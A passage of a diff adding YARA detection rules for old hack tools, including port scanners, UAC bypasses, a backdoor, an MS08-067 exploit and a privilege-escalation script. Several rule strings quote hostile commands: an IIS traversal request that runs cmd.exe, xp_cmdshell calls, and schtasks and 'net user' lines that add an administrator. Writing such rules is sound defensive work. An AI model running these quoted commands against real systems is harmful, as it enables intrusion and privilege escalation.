+	strings:
+		$s0 = "DarkKnight"
+		$s9 = "IPStealerUtilities"
+	condition:
+		all of them
+}
+
+rule SuperScan4 {
+	meta:
+		description = "Auto-generated rule on file SuperScan4.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "78f76428ede30e555044b83c47bc86f0"
+	strings:
+		$s2 = " td class=\"summO1\">"
+		$s6 = "REM'EBAqRISE"
+		$s7 = "CorExitProcess'msc#e"
+	condition:
+		all of them
+
+}
+rule PortRacer {
+	meta:
+		description = "Auto-generated rule on file PortRacer.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "2834a872a0a8da5b1be5db65dfdef388"
+	strings:
+		$s0 = "Auto Scroll BOTH Text Boxes"
+		$s4 = "Start/Stop Portscanning"
+		$s6 = "Auto Save LogFile by pressing STOP"
+	condition:
+		all of them
+}
+
+rule scanarator {
+	meta:
+		description = "Auto-generated rule on file scanarator.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "848bd5a518e0b6c05bd29aceb8536c46"
+	strings:
+		$s4 = "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
+	condition:
+		all of them
+}
+
+rule aolipsniffer {
+	meta:
+		description = "Auto-generated rule on file aolipsniffer.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "51565754ea43d2d57b712d9f0a3e62b8"
+	strings:
+		$s0 = "C:\\Program Files\\Microsoft Visual Studio\\VB98\\VB6.OLB"
+		$s1 = "dwGetAddressForObject"
+		$s2 = "Color Transfer Settings"
+		$s3 = "FX Global Lighting Angle"
+		$s4 = "Version compatibility info"
+		$s5 = "New Windows Thumbnail"
+		$s6 = "Layer ID Generator Base"
+		$s7 = "Color Halftone Settings"
+		$s8 = "C:\\WINDOWS\\SYSTEM\\MSWINSCK.oca"
+	condition:
+		all of them
+}
+
+rule _Bitchin_Threads_ {
+	meta:
+		description = "Auto-generated rule on file =Bitchin Threads=.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "7491b138c1ee5a0d9d141fbfd1f0071b"
+	strings:
+		$s0 = "DarKPaiN"
+		$s1 = "=BITCHIN THREADS"
+	condition:
+		all of them
+}
+
+rule cgis4_cgis4 {
+	meta:
+		description = "Auto-generated rule on file cgis4.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "d658dad1cd759d7f7d67da010e47ca23"
+	strings:
+		$s0 = ")PuMB_syJ"
+		$s1 = "&,fARW>yR"
+		$s2 = "m3hm3t_rullaz"
+		$s3 = "7Projectc1"
+		$s4 = "Ten-GGl\""
+		$s5 = "/Moziqlxa"
+	condition:
+		all of them
+}
+
+rule portscan {
+	meta:
+		description = "Auto-generated rule on file portscan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "a8bfdb2a925e89a281956b1e3bb32348"
+	strings:
+		$s5 = "0    :SCAN BEGUN ON PORT:"
+		$s6 = "0    :PORTSCAN READY."
+	condition:
+		all of them
+}
+
+rule ProPort_zip_Folder_ProPort {
+	meta:
+		description = "Auto-generated rule on file ProPort.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "c1937a86939d4d12d10fc44b7ab9ab27"
+	strings:
+		$s0 = "Corrupt Data!"
+		$s1 = "K4p~omkIz"
+		$s2 = "DllTrojanScan"
+		$s3 = "GetDllInfo"
+		$s4 = "Compressed by Petite (c)1999 Ian Luck."
+		$s5 = "GetFileCRC32"
+		$s6 = "GetTrojanNumber"
+		$s7 = "TFAKAbout"
+	condition:
+		all of them
+}
+
+rule StealthWasp_s_Basic_PortScanner_v1_2 {
+	meta:
+		description = "Auto-generated rule on file StealthWasp's Basic PortScanner v1.2.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "7c0f2cab134534cd35964fe4c6a1ff00"
+	strings:
+		$s1 = "Basic PortScanner"
+		$s6 = "Now scanning port:"
+	condition:
+		all of them
+}
+
+rule BluesPortScan {
+	meta:
+		description = "Auto-generated rule on file BluesPortScan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "6292f5fc737511f91af5e35643fc9eef"
+	strings:
+		$s0 = "This program was made by Volker Voss"
+		$s1 = "JiBOo~SSB"
+	condition:
+		all of them
+}
+
+rule scanarator_iis {
+	meta:
+		description = "Auto-generated rule on file iis.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "3a8fc02c62c8dd65e038cc03e5451b6e"
+	strings:
+		$s0 = "example: iis 10.10.10.10"
+		$s1 = "send error"
+	condition:
+		all of them
+}
+
+rule stealth_Stealth {
+	meta:
+		description = "Auto-generated rule on file Stealth.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "8ce3a386ce0eae10fc2ce0177bbc8ffa"
+	strings:
+		$s3 = "<table width=\"60%\" bgcolor=\"black\" cellspacing=\"0\" cellpadding=\"2\" border=\"1\" bordercolor=\"white\"><tr><td>"
+		$s6 = "This tool may be used only by system administrators. I am not responsible for "
+	condition:
+		all of them
+}
+
+rule Angry_IP_Scanner_v2_08_ipscan {
+	meta:
+		description = "Auto-generated rule on file ipscan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "70cf2c09776a29c3e837cb79d291514a"
+	strings:
+		$s0 = "_H/EnumDisplay/"
+		$s5 = "ECTED.MSVCRT0x"
+		$s8 = "NotSupported7"
+	condition:
+		all of them
+}
+
+rule crack_Loader {
+	meta:
+		description = "Auto-generated rule on file Loader.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "f4f79358a6c600c1f0ba1f7e4879a16d"
+	strings:
+		$s0 = "NeoWait.exe"
+		$s1 = "RRRRRRRW"
+	condition:
+		all of them
+}
+
+rule CN_GUI_Scanner {
+	meta:
+		description = "Detects an unknown GUI scanner tool - CN background"
+		author = "Florian Roth"
+		hash = "3c67bbb1911cdaef5e675c56145e1112"
+		score = 65
+		date = "04.10.2014"
+	strings:
+		$s1 = "good.txt" fullword ascii
+		$s2 = "IP.txt" fullword ascii
+		$s3 = "xiaoyuer" fullword ascii
+		$s0w = "ssh(" fullword wide
+		$s1w = ").exe" fullword wide
+	condition:
+		all of them
+}
+
+rule CN_Packed_Scanner {
+	meta:
+		description = "Suspiciously packed executable"
+		author = "Florian Roth"
+		hash = "6323b51c116a77e3fba98f7bb7ff4ac6"
+		score = 40
+		date = "06.10.2014"
+	strings:
+		$s1 = "kernel32.dll" fullword ascii
+		$s2 = "CRTDLL.DLL" fullword ascii
+		$s3 = "__GetMainArgs" fullword ascii
+		$s4 = "WS2_32.DLL" fullword ascii
+	condition:
+		all of them and filesize < 180KB and filesize > 70KB
+}
+
+rule Tiny_Network_Tool_Generic {
+	meta:
+		description = "Tiny tool with suspicious function imports. (Rule based on WinEggDrop Scanner samples)"
+		author = "Florian Roth"
+		date = "08.10.2014"
+		score = 40
+		type = "file"
+		hash0 = "9e1ab25a937f39ed8b031cd8cfbc4c07"
+		hash1 = "cafc31d39c1e4721af3ba519759884b9"
+		hash2 = "8e635b9a1e5aa5ef84bfa619bd2a1f92"
+	strings:
+		$magic	= { 4d 5a }
+
+		$s0 = "KERNEL32.DLL" fullword ascii
+		$s1 = "CRTDLL.DLL" fullword ascii
+		$s3 = "LoadLibraryA" fullword ascii
+		$s4 = "GetProcAddress" fullword ascii
+
+		$y1 = "WININET.DLL" fullword ascii
+		$y2 = "atoi" fullword ascii
+
+		$x1 = "ADVAPI32.DLL" fullword ascii
+		$x2 = "USER32.DLL" fullword ascii
+		$x3 = "wsock32.dll" fullword ascii
+		$x4 = "FreeSid" fullword ascii
+		$x5 = "atoi" fullword ascii
+
+		$z1 = "ADVAPI32.DLL" fullword ascii
+		$z2 = "USER32.DLL" fullword ascii
+		$z3 = "FreeSid" fullword ascii
+		$z4 = "ToAscii" fullword ascii
+
+	condition:
+		( $magic at 0 ) and all of ($s*) and ( all of ($y*) or all of ($x*) or all of ($z*) ) and filesize < 15KB
+}
+
+rule Beastdoor_Backdoor {
+	meta:
+		description = "Detects the backdoor Beastdoor"
+		author = "Florian Roth"
+		score = 55
+		hash = "5ab10dda548cb821d7c15ebcd0a9f1ec6ef1a14abcc8ad4056944d060c49535a"
+	strings:
+		$s0 = "Redirect SPort RemoteHost RPort  -->Port Redirector" fullword
+		$s1 = "POST /scripts/WWPMsg.dll HTTP/1.0" fullword
+		$s2 = "http://IP/a.exe a.exe            -->Download A File" fullword
+		$s7 = "Host: wwp.mirabilis.com:80" fullword
+		$s8 = "%s -Set Port PortNumber              -->Set The Service Port" fullword
+		$s11 = "Shell                            -->Get A Shell" fullword
+		$s14 = "DeleteService ServiceName        -->Delete A Service" fullword
+		$s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword
+		$s17 = "%s -Set ServiceName ServiceName      -->Set The Service Name" fullword
+	condition:
+		2 of them
+}
+
+rule Powershell_Netcat {
+	meta:
+		description = "Detects a Powershell version of the Netcat network hacking tool"
+		author = "Florian Roth"
+		score = 60
+		date = "10.10.2014"
+	strings:
+		$s0 = "[ValidateRange(1, 65535)]" fullword
+		$s1 = "$Client = New-Object -TypeName System.Net.Sockets.TcpClient" fullword
+		$s2 = "$Buffer = New-Object -TypeName System.Byte[] -ArgumentList $Client.ReceiveBufferSize" fullword
+	condition:
+		all of them
+}
+
+rule Chinese_Hacktool_1014 {
+	meta:
+		description = "Detects a chinese hacktool with unknown use"
+		author = "Florian Roth"
+		score = 60
+		date = "10.10.2014"
+		hash = "98c07a62f7f0842bcdbf941170f34990"
+	strings:
+		$s0 = "IEXT2_IDC_HORZLINEMOVECURSOR" fullword wide
+		$s1 = "msctls_progress32" fullword wide
+		$s2 = "Reply-To: %s" fullword ascii
+		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
+		$s4 = "html htm htx asp" fullword ascii
+	condition:
+		all of them
+}
+
+rule CN_Hacktool_BAT_PortsOpen {
+	meta:
+		description = "Detects a chinese BAT hacktool for local port evaluation"
+		author = "Florian Roth"
+		score = 60
+		date = "12.10.2014"
+	strings:
+		$s0 = "for /f \"skip=4 tokens=2,5\" %%a in ('netstat -ano -p TCP') do (" ascii
+		$s1 = "in ('tasklist /fi \"PID eq %%b\" /FO CSV') do " ascii
+		$s2 = "@echo off" ascii
+	condition:
+		all of them
+}
+
+rule CN_Hacktool_SSPort_Portscanner {
+	meta:
+		description = "Detects a chinese Portscanner named SSPort"
+		author = "Florian Roth"
+		score = 70
+		date = "12.10.2014"
+	strings:
+		$s0 = "Golden Fox" fullword wide
+		$s1 = "Syn Scan Port" fullword wide
+		$s2 = "CZ88.NET" fullword wide
+	condition:
+		all of them
+}
+
+rule CN_Hacktool_ScanPort_Portscanner {
+	meta:
+		description = "Detects a chinese Portscanner named ScanPort"
+		author = "Florian Roth"
+		score = 70
+		date = "12.10.2014"
+	strings:
+		$s0 = "LScanPort" fullword wide
+		$s1 = "LScanPort Microsoft" fullword wide
+		$s2 = "www.yupsoft.com" fullword wide
+	condition:
+		all of them
+}
+
+rule CN_Hacktool_S_EXE_Portscanner {
+	meta:
+		description = "Detects a chinese Portscanner named s.exe"
+		author = "Florian Roth"
+		score = 70
+		date = "12.10.2014"
+	strings:
+		$s0 = "\\Result.txt" fullword ascii
+		$s1 = "By:ZT QQ:376789051" fullword ascii
+		$s2 = "(http://www.eyuyan.com)" fullword wide
+	condition:
+		all of them
+}
+
+rule CN_Hacktool_MilkT_BAT {
+	meta:
+		description = "Detects a chinese Portscanner named MilkT - shipped BAT"
+		author = "Florian Roth"
+		score = 70
+		date = "12.10.2014"
+	strings:
+		$s0 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" ascii
+		$s1 = "if not \"%Choice%\"==\"\" set Choice=%Choice:~0,1%" ascii
+	condition:
+		all of them
+}
+
+rule CN_Hacktool_MilkT_Scanner {
+	meta:
+		description = "Detects a chinese Portscanner named MilkT"
+		author = "Florian Roth"
+		score = 60
+		date = "12.10.2014"
+	strings:
+		$s0 = "Bf **************" ascii fullword
+		$s1 = "forming Time: %d/" ascii
+		$s2 = "KERNEL32.DLL" ascii fullword
+		$s3 = "CRTDLL.DLL" ascii fullword
+		$s4 = "WS2_32.DLL" ascii fullword
+		$s5 = "GetProcAddress" ascii fullword
+		$s6 = "atoi" ascii fullword
+	condition:
+		all of them
+}
+
+rule CN_Hacktool_1433_Scanner {
+	meta:
+		description = "Detects a chinese MSSQL scanner"
+		author = "Florian Roth"
+		score = 40
+		date = "12.10.2014"
+	strings:
+		$magic = { 4d 5a }
+		$s0 = "1433" wide fullword
+		$s1 = "1433V" wide
+		$s2 = "del Weak1.txt" ascii fullword
+		$s3 = "del Attack.txt" ascii fullword
+		$s4 = "del /s /Q C:\\Windows\\system32\\doors\\" fullword ascii
+		$s5 = "!&start iexplore http://www.crsky.com/soft/4818.html)" fullword ascii
+	condition:
+		( $magic at 0 ) and all of ($s*)
+}
+
+rule CN_Hacktool_1433_Scanner_Comp2 {
+	meta:
+		description = "Detects a chinese MSSQL scanner - component 2"
+		author = "Florian Roth"
+		score = 40
+		date = "12.10.2014"
+	strings:
+		$magic = { 4d 5a }
+		$s0 = "1433" wide fullword
+		$s1 = "1433V" wide
+		$s2 = "UUUMUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUMUUU" ascii fullword
+	condition:
+		( $magic at 0 ) and all of ($s*)
+}
+
+rule WCE_Modified_1_1014 {
+	meta:
+		description = "Modified (packed) version of Windows Credential Editor"
+		author = "Florian Roth"
+		hash = "09a412ac3c85cedce2642a19e99d8f903a2e0354"
+		score = 70
+	strings:
+		$s0 = "LSASS.EXE" fullword ascii
+		$s1 = "_CREDS" ascii
+		$s9 = "Using WCE " ascii
+	condition:
+		all of them
+}
+
+rule ReactOS_cmd_valid {
+	meta:
+		description = "ReactOS cmd.exe with correct file name - maybe packed with software or part of hacker toolset"
+		author = "Florian Roth"
+		date = "05.11.14"
+		reference = "http://www.elifulkerson.com/articles/suzy-sells-cmd-shells.php"
+		score = 30
+		hash = "b88f050fa69d85af3ff99af90a157435296cbb6e"
+	strings:
+		$s1 = "ReactOS Command Processor" fullword wide
+		$s2 = "Copyright (C) 1994-1998 Tim Norman and others" fullword wide
+		$s3 = "Eric Kohl and others" fullword wide
+		$s4 = "ReactOS Operating System" fullword wide
+	condition:
+		all of ($s*)
+}
+
+rule iKAT_wmi_rundll {
+	meta:
+		description = "This exe will attempt to use WMI to Call the Win32_Process event to spawn rundll - file wmi_rundll.exe"
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 65
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		hash = "97c4d4e6a644eed5aa12437805e39213e494d120"
+	strings:
+		$s0 = "This operating system is not supported." fullword ascii
+		$s1 = "Error!" fullword ascii
+		$s2 = "Win32 only!" fullword ascii
+		$s3 = "COMCTL32.dll" fullword ascii
+		$s4 = "[LordPE]" ascii
+		$s5 = "CRTDLL.dll" fullword ascii
+		$s6 = "VBScript" fullword ascii
+		$s7 = "CoUninitialize" fullword ascii
+	condition:
+		all of them and filesize < 15KB
+}
+
+rule iKAT_revelations {
+	meta:
+		description = "iKAT hack tool showing the content of password fields - file revelations.exe"
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 75
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		hash = "c4e217a8f2a2433297961561c5926cbd522f7996"
+	strings:
+		$s0 = "The RevelationHelper.DLL file is corrupt or missing." fullword ascii
+		$s8 = "BETAsupport@snadboy.com" fullword wide
+		$s9 = "support@snadboy.com" fullword wide
+		$s14 = "RevelationHelper.dll" fullword ascii
+	condition:
+		all of them
+}
+
+rule iKAT_priv_esc_tasksch {
+	meta:
+		description = "Task Schedulder Local Exploit - Windows local priv-esc using Task Scheduler, published by webDevil. Supports Windows 7 and Vista."
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 75
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		hash = "84ab94bff7abf10ffe4446ff280f071f9702cf8b"
+	strings:
+		$s0 = "objShell.Run \"schtasks /change /TN wDw00t /disable\",,True" fullword ascii
+		$s3 = "objShell.Run \"schtasks /run /TN wDw00t\",,True" fullword ascii
+		$s4 = "'objShell.Run \"cmd /c copy C:\\windows\\system32\\tasks\\wDw00t .\",,True" fullword ascii
+		$s6 = "a.WriteLine (\"schtasks /delete /f /TN wDw00t\")" fullword ascii
+		$s7 = "a.WriteLine (\"net user /add ikat ikat\")" fullword ascii
+		$s8 = "a.WriteLine (\"cmd.exe\")" fullword ascii
+		$s9 = "strFileName=\"C:\\windows\\system32\\tasks\\wDw00t\"" fullword ascii
+		$s10 = "For n = 1 To (Len (hexXML) - 1) step 2" fullword ascii
+		$s13 = "output.writeline \" Should work on Vista/Win7/2008 x86/x64\"" fullword ascii
+		$s11 = "Set objExecObject = objShell.Exec(\"cmd /c schtasks /query /XML /TN wDw00t\")" fullword ascii
+		$s12 = "objShell.Run \"schtasks /create /TN wDw00t /sc monthly /tr \"\"\"+biatchFile+\"" ascii
+		$s14 = "a.WriteLine (\"net localgroup administrators /add v4l\")" fullword ascii
+		$s20 = "Set ts = fso.createtextfile (\"wDw00t.xml\")" fullword ascii
+	condition:
+		2 of them
+}
+
+rule iKAT_command_lines_agent {
+	meta:
+		description = "iKAT hack tools set agent - file ikat.exe"
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 75
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		hash = "c802ee1e49c0eae2a3fc22d2e82589d857f96d94"
+	strings:
+		$s0 = "Extended Module: super mario brothers" fullword ascii
+		$s1 = "Extended Module: " fullword ascii
+		$s3 = "ofpurenostalgicfeeling" fullword ascii
+		$s8 = "-supermariobrotheretic" fullword ascii
+		$s9 = "!http://132.147.96.202:80" fullword ascii
+		$s12 = "iKAT Exe Template" fullword ascii
+		$s15 = "withadancyflavour.." fullword ascii
+		$s16 = "FastTracker v2.00   " fullword ascii
+	condition:
+		4 of them
+}
+
+rule iKAT_cmd_as_dll {
+	meta:
+		description = "iKAT toolset file cmd.dll ReactOS file cloaked"
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 65
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		hash = "b5d0ba941efbc3b5c97fe70f70c14b2050b8336a"
+	strings:
+		$s1 = "cmd.exe" fullword wide
+		$s2 = "ReactOS Development Team" fullword wide
+		$s3 = "ReactOS Command Processor" fullword wide
+
+		$ext = "extension: .dll" nocase
+	condition:
+		all of ($s*) and $ext
+}
+
+rule iKAT_tools_nmap {
+	meta:
+		description = "Generic rule for NMAP - based on NMAP 4 standalone"
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 50
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		hash = "d0543f365df61e6ebb5e345943577cc40fca8682"
+	strings:
+		$s0 = "Insecure.Org" fullword wide
+		$s1 = "Copyright (c) Insecure.Com" fullword wide
+		$s2 = "nmap" fullword nocase
+		$s3 = "Are you alert enough to be using Nmap?  Have some coffee or Jolt(tm)." ascii
+	condition:
+		all of them
+}
+
+rule iKAT_startbar {
+	meta:
+		description = "Tool to hide unhide the windows startbar from command line - iKAT hack tools - file startbar.exe"
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 50
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		hash = "0cac59b80b5427a8780168e1b85c540efffaf74f"
+	strings:
+		$s2 = "Shinysoft Limited1" fullword ascii
+		$s3 = "Shinysoft Limited0" fullword ascii
+		$s4 = "Wellington1" fullword ascii
+		$s6 = "Wainuiomata1" fullword ascii
+		$s8 = "56 Wright St1" fullword ascii
+		$s9 = "UTN-USERFirst-Object" fullword ascii
+		$s10 = "New Zealand1" fullword ascii
+	condition:
+		all of them
+}
+
+rule iKAT_gpdisable_customcmd_kitrap0d_uacpoc {
+	meta:
+		description = "iKAT hack tool set generic rule - from files gpdisable.exe, customcmd.exe, kitrap0d.exe, uacpoc.exe"
+		author = "Florian Roth"
+		date = "05.11.14"
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		super_rule = 1
+		hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f"
+		hash1 = "2725690954c2ad61f5443eb9eec5bd16ab320014"
+		hash2 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9"
+		hash3 = "b65a460d015fd94830d55e8eeaf6222321e12349"
+		score = 20
+	strings:
+		$s0 = "Failed to get temp file for source AES decryption" fullword
+		$s5 = "Failed to get encryption header for pwd-protect" fullword
+		$s17 = "Failed to get filetime" fullword
+		$s20 = "Failed to delete temp file for password decoding (3)" fullword
+	condition:
+		all of them
+}
+
+rule iKAT_Tool_Generic {
+	meta:
+		description = "Generic Rule for hack tool iKAT files gpdisable.exe, kitrap0d.exe, uacpoc.exe"
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 55
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		super_rule = 1
+		hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f"
+		hash1 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9"
+		hash2 = "b65a460d015fd94830d55e8eeaf6222321e12349"
+	strings:
+		$s0 = "<IconFile>C:\\WINDOWS\\App.ico</IconFile>" fullword
+		$s1 = "Failed to read the entire file" fullword
+		$s4 = "<VersionCreatedBy>14.4.0</VersionCreatedBy>" fullword
+		$s8 = "<ProgressCaption>Run &quot;executor.bat&quot; once the shell has spawned.</P"
+		$s9 = "Running Zip pipeline..." fullword
+		$s10 = "<FinTitle />" fullword
+		$s12 = "<AutoTemp>0</AutoTemp>" fullword
+		$s14 = "<DefaultDir>%TEMP%</DefaultDir>" fullword
+		$s15 = "AES Encrypting..." fullword
+		$s20 = "<UnzipDir>%TEMP%</UnzipDir>" fullword
+	condition:
+		all of them
+}
+
+rule BypassUac2 {
+	meta:
+		description = "Auto-generated rule - file BypassUac2.zip"
+		author = "yarGen Yara Rule Generator"
+		hash = "ef3e7dd2d1384ecec1a37254303959a43695df61"
+	strings:
+		$s0 = "/BypassUac/BypassUac/BypassUac_Utils.cpp" fullword ascii
+		$s1 = "/BypassUac/BypassUacDll/BypassUacDll.aps" fullword ascii
+		$s3 = "/BypassUac/BypassUac/BypassUac.ico" fullword ascii
+	condition:
+		all of them
+}
+
+rule BypassUac_3 {
+	meta:
+		description = "Auto-generated rule - file BypassUacDll.dll"
+		author = "yarGen Yara Rule Generator"
+		hash = "1974aacd0ed987119999735cad8413031115ce35"
+	strings:
+		$s0 = "BypassUacDLL.dll" fullword wide
+		$s1 = "\\Release\\BypassUacDll" ascii
+		$s3 = "Win7ElevateDLL" fullword wide
+		$s7 = "BypassUacDLL" fullword wide
+	condition:
+		3 of them
+}
+
+rule BypassUac_9 {
+	meta:
+		description = "Auto-generated rule - file BypassUac.zip"
+		author = "yarGen Yara Rule Generator"
+		hash = "93c2375b2e4f75fc780553600fbdfd3cb344e69d"
+	strings:
+		$s0 = "/x86/BypassUac.exe" fullword ascii
+		$s1 = "/x64/BypassUac.exe" fullword ascii
+		$s2 = "/x86/BypassUacDll.dll" fullword ascii
+		$s3 = "/x64/BypassUacDll.dll" fullword ascii
+		$s15 = "BypassUac" fullword ascii
+	condition:
+		all of them
+}
+
+rule BypassUacDll_6 {
+	meta:
+		description = "Auto-generated rule - file BypassUacDll.aps"
+		author = "yarGen Yara Rule Generator"
+		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
+	strings:
+		$s3 = "BypassUacDLL.dll" fullword wide
+		$s4 = "AFX_IDP_COMMAND_FAILURE" fullword ascii
+	condition:
+		all of them
+}
+
+rule BypassUacDll_7 {
+	meta:
+		description = "Auto-generated rule - file BypassUacDll.aps"
+		author = "yarGen Yara Rule Generator"
+		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
+	strings:
+		$s3 = "BypassUacDLL.dll" fullword wide
+		$s4 = "AFX_IDP_COMMAND_FAILURE" fullword ascii
+	condition:
+		all of them
+}
+
+rule BypassUac_EXE {
+	meta:
+		description = "Auto-generated rule - file BypassUacDll.aps"
+		author = "yarGen Yara Rule Generator"
+		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
+	strings:
+		$s1 = "Wole32.dll" wide
+		$s3 = "System32\\migwiz" wide
+		$s4 = "System32\\migwiz\\CRYPTBASE.dll" wide
+		$s5 = "Elevation:Administrator!new:" wide
+		$s6 = "BypassUac" wide
+	condition:
+		all of them
+}
+
+rule APT_Proxy_Malware_Packed_dev
+{
+	meta:
+		author = "FRoth"
+		date = "2014-11-10"
+		description = "APT Malware - Proxy"
+		hash = "6b6a86ceeab64a6cb273debfa82aec58"
+		score = 50
+	strings:
+		$string0 = "PECompact2" fullword
+		$string1 = "[LordPE]"
+		$string2 = "steam_ker.dll"
+	condition:
+		all of them
+}
+
+rule Tzddos_DDoS_Tool_CN {
+	meta:
+		description = "Disclosed hacktool set - file tzddos"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "d4c517eda5458247edae59309453e0ae7d812f8e"
+	strings:
+		$s0 = "for /f %%a in (host.txt) do (" fullword ascii
+		$s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii
+		$s2 = "del host.txt /q" fullword ascii
+		$s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
+		$s4 = "start Http.exe %%a %http%" fullword ascii
+		$s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii
+		$s6 = "del Result.txt s2.txt s1.txt " fullword ascii
+	condition:
+		all of them
+}
+
+rule Ncat_Hacktools_CN {
+	meta:
+		description = "Disclosed hacktool set - file nc.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "001c0c01c96fa56216159f83f6f298755366e528"
+	strings:
+		$s0 = "nc -l -p port [options] [hostname] [port]" fullword ascii
+		$s2 = "nc [-options] hostname port[s] [ports] ... " fullword ascii
+		$s3 = "gethostpoop fuxored" fullword ascii
+		$s6 = "VERNOTSUPPORTED" fullword ascii
+		$s7 = "%s [%s] %d (%s)" fullword ascii
+		$s12 = " `--%s' doesn't allow an argument" fullword ascii
+	condition:
+		all of them
+}
+
+rule MS08_067_Exploit_Hacktools_CN {
+	meta:
+		description = "Disclosed hacktool set - file cs.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "a3e9e0655447494253a1a60dbc763d9661181322"
+	strings:
+		$s0 = "MS08-067 Exploit for CN by EMM@ph4nt0m.org" fullword ascii
+		$s3 = "Make SMB Connection error:%d" fullword ascii
+		$s5 = "Send Payload Over!" fullword ascii
+		$s7 = "Maybe Patched!" fullword ascii
+		$s8 = "RpcExceptionCode() = %u" fullword ascii
+		$s11 = "ph4nt0m" fullword wide
+		$s12 = "\\\\%s\\IPC" ascii
+	condition:
+		4 of them
+}
+
+rule Hacktools_CN_Burst_sql {
+	meta:
+		description = "Disclosed hacktool set - file sql.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "d5139b865e99b7a276af7ae11b14096adb928245"
+	strings:
+		$s0 = "s.exe %s %s %s %s %d /save" fullword ascii
+		$s2 = "s.exe start error...%d" fullword ascii
+		$s4 = "EXEC sp_addextendedproc xp_cmdshell,'xplog70.dll'" fullword ascii
+		$s7 = "EXEC master..xp_cmdshell 'wscript.exe cc.js'" fullword ascii
+		$s10 = "Result.txt" fullword ascii
+		$s11 = "Usage:sql.exe [options]" fullword ascii
+		$s17 = "%s root %s %d error" fullword ascii
+		$s18 = "Pass.txt" fullword ascii
+		$s20 = "SELECT sillyr_at_gmail_dot_com INTO DUMPFILE '%s\\\\sillyr_x.so' FROM sillyr_x" fullword ascii
+	condition:
+		6 of them
+}
+
+rule Hacktools_CN_Panda_445TOOL {
+	meta:
+		description = "Disclosed hacktool set - file 445TOOL.rar"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "92050ba43029f914696289598cf3b18e34457a11"
+	strings:
+		$s0 = "scan.bat" fullword ascii
+		$s1 = "Http.exe" fullword ascii
+		$s2 = "GOGOGO.bat" fullword ascii
+		$s3 = "ip.txt" fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_Panda_445 {
+	meta:
+		description = "Disclosed hacktool set - file 445.rar"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "a61316578bcbde66f39d88e7fc113c134b5b966b"
+	strings:
+		$s0 = "for /f %%i in (ips.txt) do (start cmd.bat %%i)" fullword ascii
+		$s1 = "445\\nc.exe" fullword ascii
+		$s2 = "445\\s.exe" fullword ascii
+		$s3 = "cs.exe %1" fullword ascii
+		$s4 = "445\\cs.exe" fullword ascii
+		$s5 = "445\\ip.txt" fullword ascii
+		$s6 = "445\\cmd.bat" fullword ascii
+		$s9 = "@echo off" fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_WinEggDrop {
+	meta:
+		description = "Disclosed hacktool set - file s.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "7665011742ce01f57e8dc0a85d35ec556035145d"
+	strings:
+		$s0 = "Normal Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii
+		$s2 = "SYN Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii
